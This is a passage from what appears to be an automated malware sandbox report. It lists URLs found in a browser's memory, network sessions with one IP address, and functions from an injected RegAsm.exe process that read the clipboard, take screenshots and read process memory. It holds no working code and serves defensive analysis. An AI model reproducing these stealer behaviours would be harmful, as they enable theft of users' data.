      Source: chrome.exe, 00000008.00000003.985462586.000009B401928000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141692234.000009B40198C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.989999147.000009B40148C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1589635667.000009B401986000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1631169626.000009B401986000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985972812.000009B4019D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985646219.000009B401928000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1548179845.000009B401986000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.989939605.000009B401944000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
      Source: chrome.exe, 00000008.00000003.985462586.000009B401928000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.989999147.000009B40148C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.988406192.000009B4019BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985646219.000009B401928000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985862674.000009B401588000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141656584.000009B401980000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.989939605.000009B401944000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.ciOLm-Jy21Y.2019.O/rt=j/m=q_dnp
      Source: chrome.exe, 00000008.00000003.985462586.000009B401928000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.989999147.000009B40148C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.988406192.000009B4019BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985646219.000009B401928000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985862674.000009B401588000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141656584.000009B401980000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.989939605.000009B401944000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.gyN29IQRsEA.L.W.O/m=qmd
      Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.guitarcenter.com/cart
      Source: chrome.exe, 00000008.00000002.2133827650.000009B4009F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.harborfreight.com/checkout/cart
      Source: chrome.exe, 00000008.00000002.2133827650.000009B4009F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hmhco.com/hmhstorefront/cart
      Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.homedepot.com/mycart/home
      Source: chrome.exe, 00000008.00000002.2133827650.000009B4009F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.homesquare.com/Checkout/Cart.aspx
      Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hottopic.com/cart
      Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hsn.com/checkout/bag
      Source: chrome.exe, 00000008.00000002.2133827650.000009B4009F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ikea.com/us/en/shoppingcart/
      Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.jcpenney.com/cart
      Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.jcrew.com/checkout/cart
      Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.joann.com/cart
      Source: chrome.exe, 00000008.00000002.2133827650.000009B4009F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.kohls.com/checkout/shopping_cart.jsp
      Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.landsend.com/shopping-bag/
      Source: chrome.exe, 00000008.00000002.2131890551.000009B400664000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.973480513.000009B400664000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.llbean.com/webapp/wcs/stores/servlet/LLBShoppingCartDisplay
      Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.lowes.com/cart
      Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.lulus.com/checkout/bag
      Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.macys.com/my-bag
      Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.midwayusa.com/cart
      Source: chrome.exe, 00000008.00000002.2133973444.000009B400A38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2130385732.000009B4001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137669235.000009B40110C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137418725.000009B4010B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-release
      Source: chrome.exe, 00000008.00000002.2133904022.000009B400A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-release1.2.164946
      Source: chrome.exe, 00000008.00000002.2136603991.000009B400F34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-release7
      Source: chrome.exe, 00000008.00000002.2137246401.000009B401070000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2130385732.000009B4001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137669235.000009B40110C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2136206579.000009B400E94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/firefox/windows/
      Source: chrome.exe, 00000008.00000002.2137246401.000009B401070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/firefox/windows/#
      Source: chrome.exe, 00000008.00000002.2130945695.000009B400364000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2133973444.000009B400A38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137418725.000009B4010B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/firefox/windows/0
      Source: chrome.exe, 00000008.00000002.2130945695.000009B400364000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2133973444.000009B400A38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137418725.000009B4010B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/firefox/windows/0B
      Source: chrome.exe, 00000008.00000002.2133827650.000009B4009F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.neimanmarcus.com/checkout/cart.jsp
      Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.nike.com/cart
      Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.nordstrom.com/shopping-bag
      Source: chrome.exe, 00000008.00000002.2133827650.000009B4009F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.officedepot.com/cart/shoppingCart.do
      Source: chrome.exe, 00000008.00000002.2133827650.000009B4009F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.opticsplanet.com/checkout/cart
      Source: chrome.exe, 00000008.00000002.2135416481.000009B400D84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1546757959.000009B400D83000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.oracle.com/search/results
      Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.otterbox.com/en-us/cart
      Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.overstock.com/cart
      Source: chrome.exe, 00000008.00000002.2133148112.000009B4008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.pacsun.com/on/demandware.store/Sites-pacsun-Site/default/Cart-Show
      Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.petsmart.com/cart/
      Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.pier1.com/cart
      Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.pokemoncenter.com/cart
      Source: chrome.exe, 00000008.00000002.2133827650.000009B4009F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.potterybarn.com/shoppingcart/
      Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.qvc.com/checkout/cart.html
      Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.redbubble.com/cart
      Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.rei.com/ShoppingCart
      Source: chrome.exe, 00000008.00000003.1272121186.000009B401340000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.rest.co.il
      Source: chrome.exe, 00000008.00000002.2133827650.000009B4009F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.revolve.com/r/ShoppingBag.jsp
      Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.rockauto.com/en/cart/
      Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.saksfifthavenue.com/cart
      Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.samsclub.com/cart
      Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sephora.com/basket
      Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.shutterfly.com/cart/
      Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.staples.com/cc/mmx/cart
      Source: chrome.exe, 00000008.00000002.2133827650.000009B4009F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sweetwater.com/store/cart.php
      Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.talbots.com/cart
      Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.target.com/cart
      Source: chrome.exe, 00000008.00000002.2133827650.000009B4009F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.teacherspayteachers.com/Cart
      Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.therealreal.com/cart
      Source: chrome.exe, 00000008.00000002.2133827650.000009B4009F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.tractorsupply.com/TSCShoppingCartView
      Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ulta.com/bag
      Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.underarmour.com/en-us/cart
      Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.urbanoutfitters.com/cart
      Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.vitalsource.com/cart
      Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.walgreens.com/cart/view-ui
      Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.walmart.com/cart
      Source: chrome.exe, 00000008.00000002.2133827650.000009B4009F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.wayfair.com/v/checkout/basket/show
      Source: chrome.exe, 00000008.00000002.2133827650.000009B4009F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.weightwatchers.com/us/shop/checkout/cart
      Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.westelm.com/shoppingcart/
      Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.wiley.com/en-us/cart
      Source: chrome.exe, 00000008.00000002.2133827650.000009B4009F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.williams-sonoma.com/shoppingcart/
      Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.wish.com/cart
      Source: chrome.exe, 00000008.00000002.2133393957.000009B400940000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/:
      Source: chrome.exe, 00000008.00000002.2137374756.000009B40109C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2130814925.000009B400320000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2133393957.000009B400940000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137669235.000009B40110C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytca
      Source: chrome.exe, 00000008.00000002.2133393957.000009B400940000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J
      Source: chrome.exe, 00000008.00000002.2141553304.000009B4018B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2140308644.000009B4014F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2133393957.000009B400940000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137669235.000009B40110C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
      Source: chrome.exe, 00000008.00000002.2140308644.000009B4014F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmlult
      Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.zappos.com/cart
      Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.zazzle.com/co/cart
      Source: chrome.exe, 00000008.00000002.2133827650.000009B4009F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.zennioptical.com/shoppingCart
      Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www2.hm.com/en_us/cart
      Source: unknownNetwork traffic detected: HTTP traffic on port 49695 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49691 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49695
      Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49694
      Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49692
      Source: unknownNetwork traffic detected: HTTP traffic on port 49692 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
      Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
      Source: unknownNetwork traffic detected: HTTP traffic on port 49681 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
      Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49684
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49681
      Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49673
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
      Source: unknownNetwork traffic detected: HTTP traffic on port 49694 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49672
      Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
      Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
      Source: unknownHTTPS traffic detected: 104.21.19.177:443 -> 192.168.11.20:49711 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.19.177:443 -> 192.168.11.20:49712 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.19.177:443 -> 192.168.11.20:49720 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.19.177:443 -> 192.168.11.20:49724 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.19.177:443 -> 192.168.11.20:49725 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.19.177:443 -> 192.168.11.20:49727 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.19.177:443 -> 192.168.11.20:49728 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.19.177:443 -> 192.168.11.20:49729 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.19.177:443 -> 192.168.11.20:49730 version: TLS 1.2
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00430850 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,7_2_00430850
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00430850 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,7_2_00430850
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00430A30 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,7_2_00430A30
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0043CCB0 NtWow64ReadVirtualMemory64,7_2_0043CCB0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00438FC0 NtWow64ReadVirtualMemory64,7_2_00438FC0
      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
      Source: C:\Users\user\Desktop\7IXl1M9JGV.exeCode function: 0_2_00007FF7D77F54800_2_00007FF7D77F5480
      Source: C:\Users\user\Desktop\7IXl1M9JGV.exeCode function: 0_2_00007FF7D77F73F80_2_00007FF7D77F73F8
      Source: C:\Users\user\Desktop\7IXl1M9JGV.exeCode function: 0_2_00007FF7D7800AC80_2_00007FF7D7800AC8
      Source: C:\Users\user\Desktop\7IXl1M9JGV.exeCode function: 0_2_00007FF7D77F7B000_2_00007FF7D77F7B00
      Source: C:\Users\user\Desktop\7IXl1M9JGV.exeCode function: 0_2_00007FF7D77FC9FC0_2_00007FF7D77FC9FC
      Source: C:\Users\user\Desktop\7IXl1M9JGV.exeCode function: 0_2_00007FF7D77F65340_2_00007FF7D77F6534
      Source: C:\Users\user\Desktop\7IXl1M9JGV.exeCode function: 0_2_00007FF7D77F8D4C0_2_00007FF7D77F8D4C
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0041B8407_2_0041B840
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0043D8407_2_0043D840
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004358F07_2_004358F0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0043609F7_2_0043609F
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004391407_2_00439140
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0041C9207_2_0041C920
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0043F9D07_2_0043F9D0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00421A807_2_00421A80
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0043D3407_2_0043D340
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0041A3607_2_0041A360
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004403307_2_00440330
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0043CCB07_2_0043CCB0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00418D6F7_2_00418D6F
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0041D5707_2_0041D570
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0042B5037_2_0042B503
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00417DCE7_2_00417DCE
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0041FDF07_2_0041FDF0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0043CF007_2_0043CF00
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004357007_2_00435700
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004247C07_2_004247C0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004187827_2_00418782
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0042E0407_2_0042E040
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004278507_2_00427850
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0040A0707_2_0040A070
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004010007_2_00401000
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0042B0EC7_2_0042B0EC
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004258927_2_00425892
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0043C8917_2_0043C891
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0042D0947_2_0042D094
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004230A67_2_004230A6
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0040F0B07_2_0040F0B0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004399407_2_00439940
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004089607_2_00408960
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0040C1707_2_0040C170
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0041911F7_2_0041911F
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004261227_2_00426122
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004301C07_2_004301C0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0040B1D07_2_0040B1D0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0043E9A07_2_0043E9A0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004039B07_2_004039B0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004209B07_2_004209B0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004012777_2_00401277
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0043E2127_2_0043E212
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0040DA207_2_0040DA20
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0041D2207_2_0041D220
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004093407_2_00409340
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0040AB407_2_0040AB40
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004213797_2_00421379
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00428B007_2_00428B00
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0043C3117_2_0043C311
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004013197_2_00401319
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00425B227_2_00425B22
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00433BC37_2_00433BC3
